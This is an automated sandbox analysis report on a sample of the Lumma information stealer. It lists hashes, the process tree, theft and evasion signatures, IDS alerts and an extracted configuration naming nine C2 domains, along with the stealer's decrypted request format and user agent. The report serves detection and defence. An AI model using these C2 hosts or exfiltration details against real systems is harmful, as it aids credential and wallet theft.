Edit tour

Windows Analysis Report
SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe

Overview

General Information

Sample name:	SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe
Analysis ID:	1543317
MD5:	6b47cfd828d584f77aa7496b094c1f82
SHA1:	53779e6456cd6f8d6572c22190141d4464045f17
SHA256:	d468becc83ba215453be50cdd6079a2e16501a75c8b6b46add8437ba5f069f99
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

C2 URLs / IPs found in malware configuration

LummaC encrypted strings found

Machine Learning detection for dropped file

Queries memory information (via WMI often done to detect virtual machines)

Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Creates a process in suspended mode (likely to inject code)

Drops PE files

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Searches for user specific document files

Classification

Process Tree

System is w10x64native

SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe (PID: 6860 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe" MD5: 6B47CFD828D584F77AA7496B094C1F82)

EpicUpdate.exe (PID: 1044 cmdline: "C:\Users\user\AppData\Local\Temp\EpicUpdate.exe" MD5: A714F3782DA3635B8054341B43EFF069)

chrome.exe (PID: 7176 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" MD5: BB7C48CDDDE076E7EB44022520F40F77)

chrome.exe (PID: 2768 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-subproc-heap-profiling --field-trial-handle=2224,i,15343665010239501280,16387244067859444287,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=2244 /prefetch:3 MD5: BB7C48CDDDE076E7EB44022520F40F77)

chrome.exe (PID: 728 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --no-subproc-heap-profiling --field-trial-handle=4452,i,15343665010239501280,16387244067859444287,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=3824 /prefetch:3 MD5: BB7C48CDDDE076E7EB44022520F40F77)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["ehticsprocw.sbs", "allocatinow.sbs", "mathcucom.sbs", "scratgyy.biz", "condifendteu.sbs", "enlargkiw.sbs", "vennurviot.sbs", "resinedyw.sbs", "drawwyobstacw.sbs"], "Build id": "QxiMJI--REDLIZARD"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-27T17:04:32.509475+0100	2054653	1	A Network Trojan was detected	192.168.11.20	49745	104.21.64.165	443	TCP
2024-10-27T17:04:33.627931+0100	2054653	1	A Network Trojan was detected	192.168.11.20	49746	104.21.64.165	443	TCP
2024-10-27T17:05:00.000478+0100	2054653	1	A Network Trojan was detected	192.168.11.20	49772	104.21.64.165	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-27T17:04:32.509475+0100	2049836	1	A Network Trojan was detected	192.168.11.20	49745	104.21.64.165	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-27T17:04:33.627931+0100	2049812	1	A Network Trojan was detected	192.168.11.20	49746	104.21.64.165	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-27T17:04:53.582816+0100	2048094	1	Malware Command and Control Activity Detected	192.168.11.20	49766	104.21.64.165	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: EpicUpdate.exe.1044.2.memstrmin

Malware Configuration Extractor: LummaC {"C2 url": ["ehticsprocw.sbs", "allocatinow.sbs", "mathcucom.sbs", "scratgyy.biz", "condifendteu.sbs", "enlargkiw.sbs", "vennurviot.sbs", "resinedyw.sbs", "drawwyobstacw.sbs"], "Build id": "QxiMJI--REDLIZARD"}

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe

ReversingLabs: Detection: 57%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000002.00000003.32268342328.0000000001530000.00000004.00000020.00020000.00000000.sdmp	String decryptor: drawwyobstacw.sbs
Source: 00000002.00000003.32268342328.0000000001530000.00000004.00000020.00020000.00000000.sdmp	String decryptor: condifendteu.sbs
Source: 00000002.00000003.32268342328.0000000001530000.00000004.00000020.00020000.00000000.sdmp	String decryptor: ehticsprocw.sbs
Source: 00000002.00000003.32268342328.0000000001530000.00000004.00000020.00020000.00000000.sdmp	String decryptor: vennurviot.sbs
Source: 00000002.00000003.32268342328.0000000001530000.00000004.00000020.00020000.00000000.sdmp	String decryptor: resinedyw.sbs
Source: 00000002.00000003.32268342328.0000000001530000.00000004.00000020.00020000.00000000.sdmp	String decryptor: enlargkiw.sbs
Source: 00000002.00000003.32268342328.0000000001530000.00000004.00000020.00020000.00000000.sdmp	String decryptor: allocatinow.sbs
Source: 00000002.00000003.32268342328.0000000001530000.00000004.00000020.00020000.00000000.sdmp	String decryptor: mathcucom.sbs
Source: 00000002.00000003.32268342328.0000000001530000.00000004.00000020.00020000.00000000.sdmp	String decryptor: scratgyy.biz
Source: 00000002.00000003.32268342328.0000000001530000.00000004.00000020.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000002.00000003.32268342328.0000000001530000.00000004.00000020.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000002.00000003.32268342328.0000000001530000.00000004.00000020.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000002.00000003.32268342328.0000000001530000.00000004.00000020.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000002.00000003.32268342328.0000000001530000.00000004.00000020.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000002.00000003.32268342328.0000000001530000.00000004.00000020.00020000.00000000.sdmp	String decryptor: QxiMJI--REDLIZARD

Source: unknown	HTTPS traffic detected: 52.113.194.132:443 -> 192.168.11.20:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.165:443 -> 192.168.11.20:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.165:443 -> 192.168.11.20:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.165:443 -> 192.168.11.20:49766 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.165:443 -> 192.168.11.20:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.165:443 -> 192.168.11.20:49768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.165:443 -> 192.168.11.20:49769 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.165:443 -> 192.168.11.20:49770 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.165:443 -> 192.168.11.20:49771 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.165:443 -> 192.168.11.20:49772 version: TLS 1.2

Source: SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: redlizard.pdbj source: EpicUpdate.exe, 00000002.00000003.32268595883.0000000002F9D000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: redlizard.pdb source: EpicUpdate.exe, 00000002.00000003.32268595883.0000000002F9D000.00000004.00000800.00020000.00000000.sdmp

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.11.20:49745 -> 104.21.64.165:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.11.20:49745 -> 104.21.64.165:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.11.20:49746 -> 104.21.64.165:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.11.20:49746 -> 104.21.64.165:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.11.20:49766 -> 104.21.64.165:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.11.20:49772 -> 104.21.64.165:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: ehticsprocw.sbs
Source: Malware configuration extractor	URLs: allocatinow.sbs
Source: Malware configuration extractor	URLs: mathcucom.sbs
Source: Malware configuration extractor	URLs: scratgyy.biz
Source: Malware configuration extractor	URLs: condifendteu.sbs
Source: Malware configuration extractor	URLs: enlargkiw.sbs
Source: Malware configuration extractor	URLs: vennurviot.sbs
Source: Malware configuration extractor	URLs: resinedyw.sbs
Source: Malware configuration extractor	URLs: drawwyobstacw.sbs

Source: Joe Sandbox View

IP Address: 239.255.255.250 239.255.255.250

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: unknown	TCP traffic detected without corresponding DNS query: 52.113.194.132
Source: unknown	TCP traffic detected without corresponding DNS query: 52.113.194.132
Source: unknown	TCP traffic detected without corresponding DNS query: 52.113.194.132
Source: unknown	TCP traffic detected without corresponding DNS query: 52.113.194.132
Source: unknown	TCP traffic detected without corresponding DNS query: 52.113.194.132
Source: unknown	TCP traffic detected without corresponding DNS query: 52.113.194.132
Source: unknown	TCP traffic detected without corresponding DNS query: 52.113.194.132
Source: unknown	TCP traffic detected without corresponding DNS query: 52.113.194.132
Source: unknown	TCP traffic detected without corresponding DNS query: 52.113.194.132
Source: unknown	TCP traffic detected without corresponding DNS query: 52.113.194.132
Source: unknown	TCP traffic detected without corresponding DNS query: 52.113.194.132
Source: unknown	TCP traffic detected without corresponding DNS query: 52.113.194.132
Source: unknown	TCP traffic detected without corresponding DNS query: 52.113.194.132
Source: unknown	TCP traffic detected without corresponding DNS query: 52.113.194.132
Source: unknown	TCP traffic detected without corresponding DNS query: 52.113.194.132
Source: unknown	TCP traffic detected without corresponding DNS query: 52.113.194.132
Source: unknown	TCP traffic detected without corresponding DNS query: 52.113.194.132
Source: unknown	TCP traffic detected without corresponding DNS query: 52.113.194.132
Source: unknown	TCP traffic detected without corresponding DNS query: 52.113.194.132
Source: unknown	TCP traffic detected without corresponding DNS query: 52.113.194.132
Source: unknown	TCP traffic detected without corresponding DNS query: 52.113.194.132
Source: unknown	TCP traffic detected without corresponding DNS query: 52.113.194.132
Source: unknown	TCP traffic detected without corresponding DNS query: 52.113.194.132
Source: unknown	TCP traffic detected without corresponding DNS query: 52.113.194.132
Source: unknown	TCP traffic detected without corresponding DNS query: 52.113.194.132
Source: unknown	TCP traffic detected without corresponding DNS query: 52.113.194.132
Source: unknown	TCP traffic detected without corresponding DNS query: 52.113.194.132
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.80.99
Source: unknown	TCP traffic detected without corresponding DNS query: 23.44.201.5
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.80.99
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.24.81
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.24.81
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 239.255.255.250
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 239.255.255.250
Source: unknown	UDP traffic detected without corresponding DNS query: 239.255.255.250
Source: unknown	UDP traffic detected without corresponding DNS query: 239.255.255.250
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /config/v2/Office/officeclicktorun/16.0.14326.20384/Production/CC?&Clientid=%7bB0D7ECDF-3EEF-4767-BB67-27861CCFA721%7d&Application=officeclicktorun&Platform=win32&Version=16.0.14326.20384&MsoVersion=16.0.14326.20384&Audience=Production&Build=ship&Architecture=x64&OsVersion=10.0&OsBuild=19042&Channel=CC&InstallType=C2R&SessionId=%7b416D32E9-EAB1-474A-BE66-27112055BEE5%7d&LabMachine=false HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipIf-None-Match: "vbfTVf/bCysSx4WnMqc2RY2GVSYWfpgdMSpIVEM4P5Q="User-Agent: Microsoft Office 2014DisableExperiments: falseHost: ecs.office.com
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIkqHLAQic/swBCIWgzQEIrJ7OAQjkr84BCMO2zgEIvbnOAQjtvM4BCLu9zgEI1r3OAQjMv84BGMHLzAEYva7OARidsc4BSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIkqHLAQic/swBCIWgzQEIrJ7OAQjkr84BCMO2zgEIvbnOAQjtvM4BCLu9zgEI1r3OAQjMv84BGMHLzAEYva7OARidsc4BSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
Source: global traffic	HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YJblGJXJ-bgGIjBjKah9wGrJMTTp-NeylW3cNWLLiDs2v6zWNsaZdGDgstSYwTKUqhP1c1YJbAnaRSgyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIkqHLAQic/swBCIWgzQEIrJ7OAQjkr84BCMO2zgEIvbnOAQjtvM4BCLu9zgEI1r3OAQjMv84BGMHLzAEYva7OARidsc4BSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
Source: global traffic	HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJblGJXJ-bgGIjAxADqPFati6aNWAS11l0vMQ8zDUJeVR1-nuFIhNKu_EJhp1U7fbLuAmb4KubHNeo0yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu

Source: chrome.exe, 00000003.00000002.32739868769.00005C8C02AF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000003.00000002.32747973405.00005C8C039A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: /https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 00000003.00000002.32739868769.00005C8C02AF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 00000003.00000003.32321316712.00005C8C02418000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.32321148402.00005C8C03740000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends CrLitElement{constructor(){super(...arguments);this.url={url:""}}static get is(){return"ntp-doodle-share-dialog"}static get styles(){return getCss$1()}render(){return getHtml$1.bind(this)()}static get properties(){return{title:{type:String},url:{type:Object}}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.fire("share",channel)}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);let instance$2=null;function getCss(){return instance$2\|\|(instance$2=[...[getCss$3()],css`:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#doodle{position:relative}#shareButton{background-color:var(--color-new-tab-page-doodle-share-button-background,none);border:none;height:32px;min-width:32px;padding:0;position:absolute;width:32px;bottom:0}:host-context([dir=ltr]) #shareButton{right:-40px}:host-context([dir=rtl]) #shareButton{left:-40px}#shareButtonIcon{width:18px;height:18px;margin:7px;vertical-align:bottom;mask-image:url(chro
Source: chrome.exe, 00000003.00000003.32321316712.00005C8C02418000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.32321148402.00005C8C03740000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends CrLitElement{constructor(){super(...arguments);this.url={url:""}}static get is(){return"ntp-doodle-share-dialog"}static get styles(){return getCss$1()}render(){return getHtml$1.bind(this)()}static get properties(){return{title:{type:String},url:{type:Object}}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.fire("share",channel)}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);let instance$2=null;function getCss(){return instance$2\|\|(instance$2=[...[getCss$3()],css`:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#doodle{position:relative}#shareButton{background-color:var(--color-new-tab-page-doodle-share-button-background,none);border:none;height:32px;min-width:32px;padding:0;position:absolute;width:32px;bottom:0}:host-context([dir=ltr]) #shareButton{right:-40px}:host-context([dir=rtl]) #shareButton{left:-40px}#shareButtonIcon{width:18px;height:18px;margin:7px;vertical-align:bottom;mask-image:url(chro
Source: chrome.exe, 00000003.00000002.32736348840.00005C8C02388000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: gnkcojhhkbfbldkacnbeo{"ack_external":true,"active_bit":false,"allowlist":1,"app_launcher_ordinal":"y","creation_flags":137,"first_install_time":"13273758449372370","from_bookmark":false,"from_webstore":true,"last_update_time":"13273758449372370","lastpingday":"13273743588725962","location":1,"manifest":{"app":{"launch":{"container":"tab","web_url":"http://www.youtube.com"},"web_content":{"enabled":true,"origin":"http://www.youtube.com"}},"current_locale":"en","default_locale":"en","description":"","icons":{"128":"128.png"},"key":"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDC/HotmFlyuz5FaHaIbVBhhL4BwbcUtsfWwzgUMpZt5ZsLB2nW/Y5xwNkkPANYGdVsJkT2GPpRRIKBO5QiJ7jPMa3EZtcZHpkygBlQLSjMhdrAKevpKgIl6YTkwzNvExY6rzVDzeE9zqnIs33eppY4S5QcoALMxuSWlMKqgFQjHQIDAQAB","manifest_version":2,"name":"YouTube","update_url":"http://clients2.google.com/service/update2/crx","version":"4.2.8"},"page_ordinal":"n","path":"blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0","state":1,"was_installed_by_default":true,"was_installed_by_oem":false} equals www.youtube.com (Youtube)
